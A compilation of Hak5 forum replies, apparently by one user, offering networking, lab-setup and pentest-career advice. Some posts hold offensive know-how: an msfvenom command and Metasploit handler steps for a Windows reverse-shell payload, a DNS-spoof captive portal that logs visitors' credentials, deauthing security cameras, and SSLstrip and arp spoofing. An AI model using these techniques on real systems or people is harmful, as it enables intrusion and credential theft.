digip

I had recently seen something for Powershell, that allows any code to run, but required a registry tweak to accept the applied manifests or signatures for the scripts. Not exactly what you were looking for, but something might spark an idea on how to work around a whitelist for apps.

I take it you are in India? Might want to edit your post, remove your public IP address.

I think it depends on the camera and DVR, and if they are only wifi based. If they are wired to the network, they you'd have to be on the same network to connect with them, or if mis-configured, connect to them over the internet, which sadly, a lot of cameras are open directly from the web, not just for viewing, but also to login to the admin panel of the cameras. A lot of the cameras have built in web servers, but are still attached to the local network as clients, and you'd have to still be on the same LAN to connect with the camera in most cases. You can login to view remotely what is on the camera over wifi on many of them if they are configured this way, and some are configured for two different types of users, normal viewing only mode, and admin panel privs for setting up email alerts, motion activated capture, night vision settings, and offloading to storage for images or video. That is how one of mine is anyway. Evil Twin, in this instances, might not work the way you're thinking though, as the DVR's are usually plugged in over the wired network side, not on wifi(just what I've seen, but doesn't mean they all work this way). While you could make the camera connect back to you with the evil twin, if it were an open network, but more than likely, the DVR, is somewhere attached over ethernet, and not wifi based alone, but I don't own a DVR, so can't say for sure that all of them work this way. I know at my wife's old work, the camera system was wireless, but the DVR for the security system, was wired to the network(was actually VHS, not digital), and the cameras were just clients of the same network over wifi and was easy to prevent the system from working by deauthing the cameras, the DVR would record nothing. Poor implementation in this case. My camera is connected to the network over wifi, but can also be done over ethernet with wifi disabled, but for putting it outside or on edge of the house, I had to use wifi and it's a client of my network when I had it up. So while it has it's own web server built in, it's still a client of my network, and in order for me to reach it directly to record and save images, you need to setup a local server, which in the case of DVR's, they more or less are the storage server, and often, creds are for FTP to save out from the camera to the Storage server(this is just how mine worked, not sure if DVR's are any more secure than this). Mine I just setup filezilla at the time, and saved off over FTP, which is plain text in the clear passwords, and I don't recommend this if you can avoid it. So if you can make yourself the same SSID as the home network router, you may be able to see the camera's directly, but unless the DVR is wireless as well, you'd need to be on the same network to get access to the DVR itself.

If you don't have a background in Information Technology, ie: no formal training, at a minimum, get some basic classes in. If you truly know your networking and sysadmin stuff, then sure, take a gander at SANS and Offsec, but don't just jump in, if you don't have some sort of foundational grasp of things. Comptia Network+, Linux+(even an A+ class, but not required) and a basic windows MCP class, should be enough to grasp most things needed for the security side, but most people in penetration testing started on the LAN side or as System Administrators and networking backgrounds before going the other side. Not a requirement, but will make your life much easier before trying a pentesting course. Knowing TCP/IP basics, the OSI model, and some form of file sharing and network administration, ie: Active Directory, SMB/Samba, and Windows and Linux OS command line use, will greatly help you in the long run. Offsec's PWK, is more or less entry level pentesting, but I wouldn't consider it an easy course by any means. It's very foundational, and very instructional, but it's a 100% hands on, you need to physically do the task, to pass. Part video, part text instructional, you'll spend most of your times, in a VPN'ed virtual lab, performing real attacks against actual installed machines setup with real world vulnerabilities or mis-configurations, and all networked, like a real corporate network, allowing you to attack one machine and pivot through the network to others. SANS is also a really good class, but I wouldn't consider either theirs or offsec to be, hey, took the class, now I'm a pro. It will definitely build the mindset needed to be a pentester, and both will allow you to physically do the things you would in a pentest, SANS being a number of courses some of which may only be instructional and multiple choice questions, OSCP and other offsec courses are all hands-on, you have to perform actual hacking tasks, to pass, and no multiple choice questions. You also have to write an actual pentest report, which is a part of your passing grade as well, so don't just pass that part up, because it's what you would need to know and do well in the real world if doing the same thing for your job. If you have no background in any of the above I mentioned, start out gradually and build on the basics. Cybrary, Youtube, Google and Security Tub can help. Look into the following materials, which you don't have to take the vertifications, but can still read the books on the topics to get more well rounded: CompTIA Network+ CompTIA Linux+ CompTIA Security+ Microsft MCP books for MCSA/MCSE Setup a home lab with some virtual machines, setup a domain controller with windows server, an Active Directory domain, network some client computers to it, and try out some CTF's from places like Vulnhub or Hack The Box, as well as Pentester Academy. Then I'd work on PWk/OSCP and then maybe SANS.

Basically, know how to be a sysadmin, OS guru and network monkey, before jumping into the deep end of the pool. Pentesters that know this stuff because most of them come from that background first, and generally do because they know where the weaknesses are in the setup and misconfiguration of most systems and networks because they spent time setting them up previously in their career. Maybe not all of them, but a lot of them start that side of the fence. A lot of those guys started out as general Windows and Linux admins, with certs for things like MCSA, CCNA, etc, and have a well rounded understanding of networking, protocols and services and how all of that connects to one another. This is only a small part of the puzzle though. Writing shellcode and lower level things will require more than just throwing a hell mary from metapsloit at a system, require time and dedication. Understanding what is happening, and why, is more important that how many shells you can pop, and popped shells != pentesting. There are a lot of things to take into consideration, from scope, impact to business and finances, etc. People who think they know more, tend to know the least. Just in my experience. I know enough, to know I don't know enough. You can't learn anything, if you think you know everything already. Be humble, and curious would be my suggestion. Those people you think you know more than, could probably teach you many things more than you know already, and all of which, would help you in the long run.

You can set netcat to listen, and when it connects back, you will see the connection, but not be able to interact with it. Sometimes funky characters come back in the console(from what I recall) but not always. If it's not metasploit communicating with it, it won't setup the session properly, when meterpreter based payloads are used. If using meterpreter based payloads, as far as I know, you need to be listening in metasploit to handle the session(or armitage, which is just a GUI base for metasploit, just an example), but maybe there are options to change that in msvenom when creating the payload, or, just use a generic one not meterpreter based instead. When you use a meterpreter based shell, metasploit looks for specific hooks to send a stager back over, which are also architecture based, ie: x86 meterpreter shell vs x64 based, and handle the connection differently in how it gets executed on the victim machine and to the attacker.

If the box is 64bit(which more than likely it is for windows 8) then use what I put above, and not the x86 you tried before. Just need to rule that out and also try adding the tag for no bad characters, ie: x00, etc

I don't think that is the case, but I'd retrace the setup process for the executable run on the victim machine. Make sure you encode the executable with no bad characters to ignore like 0D, 0A, and 00, etc, and pic the right architecture(32 vs 64bit). Make sure you're listening on the correct port or try a different port range. if the victim is in a VM connected to the host or such, make sure bridged networking isn't sharing the same MAC address and they are properly networked. If behind NAT, be sure to port forward properly to the listening machine and so on. Just throwing out things to check and make sure are setup properly. Post the whole string you used to create the binary file. edit: Just to show a working example, here is what I did on my own system against a Windows 7 x64 box. msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.66 lport=4444 -b '\x0A\x0D\x00' -f exe -o poop.exe msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.66 set lport 4444 exploit sessions sessions 1 dir

what is the commands you type after interacting with the session? Do a basic ls or dir for windows. Do you get a files listing from the windows machine? If not, something isn't setup 100%. Even id cmd was disabled on the windows 8 machine, you should get some kind of return like "command prompt has been disabled by your administrator" or such.

Type "sessions", what is listed?

Should probably link to the parent wiki's for eachs device on the official Hak5 git repo too, for the general documentation and things not covered by yours. https://github.com/hak5 and https://github.com/hak5darren/wifipineapple-wiki as well as https://ducktoolkit.com/ which I believe is just the website render from the Git files.

I used Fruity wifi to redirect my visitors, and can't remember, but I think it's DNSspoof that it uses along with responder to catch and redirect them. When you logon and open a browser on any device, it redirects to my portal page, which is just a bit of PHP and HTML that saves anything they type and enter on the form, to a CSV file. It is most definitely a DNS spoof attack. However, it will not work on anything that has HSTS, although I do have SSL enabled on my attacking machine, if the site uses HSTS, it won't work to send them the portal. It will capture the creds over https though so long as they don't have HSTS or hard coded sites in the browser(many browsers do this now for top sites like google and facebook), since the page runs locally on the server and is where I redirect them to, but HSTS will prevent loading if they try to go to say, google.com or facebook.com. For that, you apparently need SSL Strvip for V1 and V2, and I couldn't seem to get it working on my test machine, but that doens't mean it can't be done. SSLstrip v2 or SSlstrip+ claims to be able to bypass HSTS though. See here :https://github.com/LeonardoNve/sslstrip2

You can use the @ symbol in front of a name, will ping people for replies on a post. As for spanning a port, he's talking about port mirroring(I assume) which is a feature of certain equipment, built into certain routers and switches, such as higher end cisco switches. It allows you to patch and copy a specific port out to a listening node, which lets you go down the line one by one to listen in on each connected device. On wifi, only thing I can say is MITM, or sniff from the router directly which in your case, probably not possible with the all-in-one devices provided by the ISP. It could be, that the firewalls blocked the local network from the ISP side, and may be a subnet local to the other side of the modem from the ISP side, which even then, NAT should be in play. I know when I first got comcast, if I set my IP range up differently than the default 192.168.1.x subnet, and was on the 10.x.x.x network, I was able to see their internal network. This was something mis configured on their end, and shouldn't have allowed me to see their network. I was at the time, not behind NAT though, and directly connected to the modem from my workstation. This is when I first went and bought a 4 port switch with NAT to put up a firewall at the edge of my network, we're talking 1990's here, but I suspect the same could be done today, if you manage to figure out an IP range on the ISP side, and connect without NAT over a cable modem, you might be able to scan the internals of the ISP if on the same subnet settings. They can surely do the same and see into your network when you connect directly to them, which is why you should always have a NAT'd firewall at the edge of your home network. You can set your NIC to anything. Unless something else is on the same set subnet, you can't see each other, without being bridged between the two networks. However, plugging directly into your network, or even a PC like the bash bunny, I imagine it would show up as a new network to the internal LAN, if scanned for, which is why I was asking if anyone was playing with these kinds of tools, since they can have their own set network/subnet.

Feeding paranoia solves nothing. Find evidence and work out the issues, if there really is one.Unless your network or device has been compromised, and you know this somehow, more than likely, you're over thinking things. Is it possible for someone to remote-view or even remotely login to the machine, sure. Can they take screenshots? Sure. But they'd have to compromise the machine in some manner to do so, either by being on the same network, or you running a program that allows them access to the machine, or clicking and executing some sort of exploit code that gives them full control of the machine. Living near you isn't a requirement, and location could be anywhere from in the same house to half way around the world. If you really think the machine is compromised, investigate, or more paranoid, just nuke the box and reinstall. If you think it's your network that they could have gotten into, then assess your setup and fix as needed. First thing, check for loose cables, loose video card, and updating drivers for the Graphics card. Could even be a faulty monitor, monitor settings or refresh rate. Rule out the obvious things first and then work out the rest.

Think of this logically. Your VM, is inside the HOST. The host connects to the AP using it's wireless card. Then the VM connects to the rest of the network, through the hosts adapter. The rest of the network, if they need to reach the VM, they need to know where it is. It's "inside" the HOST. The HOST machine, is your VM's border to machines "outside" the host. This would be the same as if you bridged two wifi routers together. Everything connected to router A, would have router A's MAC address when people on router B tried to ping any of the other machines on router A. People on router A pinging each other, will see all the correct MAC addresses, as where people on router B will see the same MAC for all of the devices connected behind router A. To work around this, and if you need to use the wireless network for more than just connectivity, you would use a USB wifi adapter so everyone can see it as a physical machine on the same segment, instead of something behind a bridge(which is why other machines outside the host, see the MAC as the same as the HOST). It will still work for just normal connection to the internet and such the way you have it now, which is doing a forward of the VM to the main network segment. Below you can see the same thing, on my own network.

I don't have anything really wired other than from my desktop to the router which is on cat6a for years now, while the router is bridged wirelessly to my main router which then goes to the modem. I'd like to run directly from room to room with wired, but I just haven't bought the cable to make use of it for the new house. When/If I do, I will probably go with the Cat7a, but ideally, I need to get rid of the third router, which is an older cisco and can't do the 802.11 AC that my other two are using now. I don't even know if my other two have 10-Gigabit physical ports. I think they are only Gigabit, but better to have the 7a cable even if you don't have 10-GBit network equipment, because when you do upgrade, you'll then have that cable, vs having to upgrade both later on. It will work fine and backwards compatible, if anything should reduce network noise even more and maximize the hardware and adapter speeds you already have, even if they are only 10/100/1000 devices. I don't see any reason to buy older standards other than maybe for small patch cable to carry in a laptop case for when on the road. What is cat-7e? Cat-7 and Cat-7a. I know we're trolling you a bit, but I think maybe you think this is some simple task, which also would be breaking the law if you get caught tapping into a physical connection other than your own. How do you plan to "siphon" data, in order to make an internet connection, and from where? How are you connecting to this other said network backbone to the internet, where are these physical wires you plan to jack into? I think there is some fundamental stuff missing here on your part and the scenario. Mostly networking 101 in general seems to have just went out the window here, not sure I understand how you managed to get free inernet with a "private" network, shared with the pineapple, and then to whom? Fake AP, that hosts private network connected to itself?

And something in the VM is not right, so reset the adapter's MAC manually on the VM when not booted, then try again, or change it in the VM, and then bring the adapter down and back up to renew your lease and try again. I'm assuming the HOST's wifi is connected to an AP before the VM is even in the loop, and on the VM, the NIC is set to bridged, which is using the HOSTS already connected wifi connection? Because this is how I have to use my own internal WiFi card just to use it in the VM, which again, only works for connectivity and is shared by the host. If so, your VM is not using wifi directly nor independently, and has no real control over the network card, nor can it properly even do DHCP. It's only sharing the hosts connection, and when it sees it, it's passed back and forth to the host as a bridged adapter. It should still have it's own MAC address though, and independent IP of the HOST machine. I have mine up now to test, using my internal Intel card to connect to the network over wifi, and passing it to the VM as a bridged adapter, it can't physically get onto the network unless I have the connection from the host started first. My wired NIC however, can, and the VM creates an additional "virtual" adapter in my HOST machines network manager and shows an extra adapter for the virtual NIC. It doesn't however do this for the wifi with the same kind of control to use it independently, which is a limitation of virtual machines and internal wireless cards to begin with. In any case, using a USB wifi adapter, should resolve this issue and allow the VM, to have it's own physical network card to connect to the home AP and subnet, and from there, you can do whatever you need, whether it be surfing the web or trying arp spoofing attacks. Only other thing I would say to try, is run arp -d on the other machines against the IP of the VM, ie: "arp -d x.x.x.x" where x.x.x.x is the IP address of the VM. then ping the VM's Ip and check the arp table again, which should show whatever it believes this device's MAC to be. If it still shows the same as the HOST machine, then get a USB wifi card, and you should have no issues.

Uh..ok, I want free interwebs..sign me up! Splain me how this works?? Where do I plug in my stuff?

Sounds like the router's firewall did its job. Arbitrary internal LAN IP ranges not configured for your subnet, would be a quick red flag, but could be something as simple as someone plugged in a device like one of the hak5 USB tools, or a pineapple is bridged to your network? Are you testing anything like that on the network? Playing with any other tools like that or devices on the network? If not, time to inspect everything. If this is a home network, power all your devices down and disconnect them from the wifi and wired side, then clear the firewall log. Then from your machine, run an nmap scan nmap -n -sn 172.0.0.0/8 This will do an arp discovery of all devices on the network, their IP and MAC address. However, this should fail for all IP ranges other than what is on your subnet, ie: 172.27.x.x edit: digininja has a good point, on possibly being a mis-configured device with someone trying to manually set an IP for a machine, but if it's a home network, and not an office network, you should know who has what on the network. Also, I had thought about my original assessment to scan the 172.0.0.0/8 subnet, this should actually not work at all since you aren't on the same subnet, and you'd also end up hitting the internet, which would also fail for the arp and never get past NAT. If you configure your NIC to be on the 172.16.0.0/16 subnet and then try a scan, you should also be blocked by your router's firewall, and trigger the same kind of messages, so even if a device on the network tried to get on from a non-routable subnet, would more than likely fail unless they physically bridged the two networks/dual honed it or plugged directly into the main router/switch to share their other side of the network.

I think maybe something is out of whack from when you were playing with arp spoof, you should probably reset the MAC on the VM's adapters. If doing no attacks at all before even doing arp spoof, and just checking arp -a, and they look to be wrong, I'd say reboot your VM and make sure all network settings are back to normal, no ipfoward set in the VM too. Then ping each machine, and check the arp tables again. They should reset to what they are expected. You can also check the adapter settings on the VM to see what the MAC address is set to for eth0 and wlan0, and you can change this for all VM's manually or set to random new MAC before starting the VM. If eth0 still shows the same as the host, then it's probably where things are causing issues with the arpspoof stuff, and I'm going to say try changing the NIC 's MAC manually once booted and then check arp -a again(do a ping to other machines to tell them your new MAC address), make sure it's bridge to the physical network, and not to the host only/shared by the host. Once you get your MAC addresses sorted out, and when trying the attack again with the arpspoof, see what happens. Might help to post a diagram of the machines, how they are connected. Can show the IP addresses as well and your commands, along with what is physically connected to the network. We don't really need to know the MAC addresses, but just understand that ARP attacks happen at layer two by poisoning the ARP table contents with the IP and MAC impersonating the gateway and victims, and the attacker, will appear as both the gateway and victim. If these didn't clear from when you reverted the machine in testing previously, your VM might have a host MAC address and just need to be reset/rebooted. You can open wireshark before doing the attack, and then see how it happens to get a better understanding of what is going on though. I don't know the topology of the network and what is what, so helps when you can see what goes where with what settings and connectivity. Might figure it out on your own just in drawing it out so you can see what you expect, and know what to fix.

I think they've done this where they shut down a second drone's wifi before. Shannone and Darren were each flyign one and Darren would shut Shannon's drone down. if you want to see something like this with a full Kali install over wifi on a drone, check our Re4sons Pi. Can do more than just wardriving - https://whitedome.com.au/re4son/sticky-fingers-kali-pi/

Self hosting is an option, but in this instance, I'd avoid it. Why expose your internal org, when you don't need to? Plenty of hosting and storage options, some cheap, some expensive. Depends on your needs. I just don't think self hosting and sharing your company network with the outside world is a best practice, unless you want to get popped and then pivoted to the rest of your internal devices(especially if your a freelance who works from home and have personal machines on the same network - I work from home so just speaking from experience). This is the reason for things like cloud storage exist, in the event files get whacked online, you should have in house backup copies and off site recovery solutions/backups in place in addition, but that is just how I would go if I had the money. An AWS bucket or Azure server might be cheap enough, or again, talk to your hosting provider, see if they are worth staying with or finding a better all-in-one hosted solution, vs paying for extra storage another host might include in the yearly plan.

If you're on mobile, might not show, but on desktop if you look at the top right of a post, you see a "follow" button. Click it. Then go to https://forums.hak5.org/discover/followed-content/ to see your followed content.

Store contact - https://hakshop.zendesk.com/hc/en-us/requests/new and generally, weekdays for responses(per their page). Shop crew is just a few people who do everything themselves, in house. They also might be at Derbycon, but I am not a member of the Hak5 crew, so I can't speak for them, just my observations. They tend to be a skeleton crew around conference time though, with many of them working at the con booth, but again, I can't speak for them. just have to wait till you hear back from them. You should get a ticket # and an email(hopefully) after your info is sent, so if you don't see anything, check your spam settings.

#1 - Forums, are not customer service. Shop isn't going to see this, generally. #2 - Patience. #3 - Contact through the store if after a week or so nothing comes to you. Wait for a response. They do respond and reply on a first come first serve basis, but don't jump the gun. Give it time.